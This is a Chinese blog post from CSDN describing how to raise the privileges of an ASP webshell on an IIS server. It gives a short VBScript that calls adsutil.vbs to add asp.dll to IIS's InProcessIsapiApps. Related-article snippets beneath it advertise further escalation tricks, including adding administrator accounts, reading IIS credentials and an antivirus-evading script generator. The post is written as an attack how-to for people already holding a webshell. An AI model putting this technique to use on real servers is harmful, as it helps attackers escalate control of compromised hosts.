ADSUTIL.VBS提权

最新推荐文章于 2019-03-23 21:43:00 发布
最新推荐文章于 2019-03-23 21:43:00 发布
阅读量1.2k 收藏
点赞数
文章标签: asp 数据库 脚本 c 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/inject2006/article/details/1784143
版权
asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下
========================================================
set wsh=createobject("wscript.shell") '创建一个wsh对象
a=wsh.run ("cmd.exe /c cscript.exe C:/Inetpub/AdminScripts/adsutil.vbs set /W3SVC/InProcessIsapiApps C:/WINNT/system32/inetsrv/httpext.dll C:/WINNT/system32/inetsrv/httpodbc.dll C:/WINNT/system32/inetsrv/ssinc.dll C:/WINNT/system32/msw3prt.dll C:/winnt/system32/inetsrv/asp.dll",0) '加入asp.dll到InProcessIsapiApps中
 
inject2006
关注
提权vbs代码
09-05
用了提升用户权限的脚本代码,学习vbs的朋友可以参考下。
adsutil.vbs
05-09
adsutil.vbs iis组件
vbs脚本文件执行提权技术技巧
hutjsk
01-08 281
vbs脚本文件执行提权技术技巧 2010年05月11日     vbs脚本文件执行技巧,今天搞了一批Webshell 准备重新练下提权技术。     3389开了,SERV-U没有。查下组件支持 WSCRIPT.SHELL没删 那就执行CMD吧。NET USER 命令可以执行 不过到加用户却没有回显 貌似不成功 权限不够?再看下组件支持 有ASP...
vbs提升权限
u012262582的专栏
09-29 5286
很多情况我们写的代码在开启UAC后由于权限不够而执行不了。这里可以加上以下代码即可提升权限。 Set args=WScript.Arguments If 0=args.Count Then Set args=Nothing:WScript.Quit cmds=args.Item(0) For i=1 To args.Count-1 para=para & args.Item(i) &" "
使用Adsutil.vbs脚本获取IIS配置信息及账号密码
cnbird's blog
10-15 1603
使用Adsutil.vbs脚本获取IIS配置信息及账号密码
使用 Adsutil.vbs iis管理脚本
09-04
Adsutil.vbs 是一个强大的工具,用于管理和配置 Internet Information Services (IIS)。这个脚本是基于 Microsoft Visual Basic Scripting Edition (VBScript) 和 Active Directory 服务接口 (ADSI),使得用户可以...
cscript adsutil.vbs 设置iis参数提示拒绝访问的解决方法
09-05
标题中的“cscript adsutil.vbs 设置iis参数提示拒绝访问的解决方法”是指在尝试使用Windows脚本宿主(cscript)执行adsutil.vbs脚本来修改IIS(Internet Information Services)配置时遇到的权限问题。adsutil.vbs是IIS...
无法找到脚本文件adsutil.vbs的解决方法
09-03
**adsutil.vbs** 是一个在 **Windows 2003** 操作系统中与 **IIS6.0 (Internet Information Services)** 配套使用的脚本文件,它主要用于通过命令行方式对IIS进行管理和配置。这个脚本包含了多种实用的命令,允许...
[转]IIS管理脚本adsutil.vbs的使用
07-18 166
Adsutil.vbs是什么?它是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,位于%SystemDrive%\Inetpub\AdminScripts目录下,95,426字节。这么大的脚本一看就知道功能肯定非常强大,事实也确是如此。我感觉它就是个命令行下的“Internet 信息服务管理器”(事实上Windows 2000用%SystemDrive%\Inet...
Adsutil.vbs基本用法及深入了解
简单的快乐
03-21 1055
Adsutil.vbs基本用法及深入了解
adsutil_vbs
05-09
Windows XP SP3 IIS 安装包下载
提权vbs+js,当提权工具不能用时
10-04
这个必须要10分了,即使它来自于网上,但也是很难找到的东西,这个工具的原理,或许可以说是一个技巧,但是,个人觉得是一种偏锋型漏洞的利用工具。 压缩包包含:user.vbs,adduser.vbs,user.js 当提权工具不能用时,不如试试:cscript user.vbs/user.js 或者自定义:cscript adduser.vbs littleevil 123456 所有脚本执行成功后添加的账户都是管理员权限。。。
星外提权全套工具.zip
06-26
星外提权全套工具,内含(ee.exe,isspwd.vbs)读取iss账号及密码。isspwd.vbs为读取iss脚本。ee.exe有两个参数,-i和-u。
入侵常用vbs提权
weixin_30686845的博客
04-27 244
3389端口查询 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\...
Adsutil.vbs命令
weixin_34245749的博客
05-05 154
Adsutil.vbs 命令Adsutil.vbs 是一个 IIS 管理实用程序,它将 Microsoft Visual Basic Scripting Edition (VBScript) 与 Active Directory 服务界面 (ADSI) 一起使用来处理 IIS 配置。该脚本应通过随 Windows 脚本主机一同安装的 CScript 运行。 要点 您必须是本...
Adsutil.vbs脚本攻击中的妙用
蓝法典的专栏
03-20 1452
一、简单介绍 adsutil.vbs 是什么?相信用过IIS的网管员不会不知道。这是IIS自带的提供于命令行下管理IIS的一个脚本。位于%SystemDrive%/Inetpub/ AdminScripts目录下。足足有95,426 字节大小。这么大的脚本一看就知道功能强大。事实也的确如此。基本上我的感觉它就是个命令行下的"Internet 信息服务管理器"。(事实上2000的服务器上%Syste
[原创]IIS提权工具-VBS提权脚本免杀生成器
weixin_30858241的博客
03-23 294
[原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53|分类: 原创工具 VBS提权脚本随机加密生成器[K.8] Author: QQ吻 QQ:396890445Team: Crack8_编程小组[K.8]Blog: http://qqhack8.blog.163.com说明:无net.exe、net1.exe提...
服务器提权技巧揭秘:C盘文件探索与权限策略
10. `CScript` 脚本文件夹(如 `adsutil.vbs`),用于Windows服务管理,可能有助于调整服务权限。 11. `AllUsers\Documents`:用户自动启动项,查看 autorun.inf 文件可能隐藏意外的入口。 12. 安全软件目录,如KV...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

inject2006

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值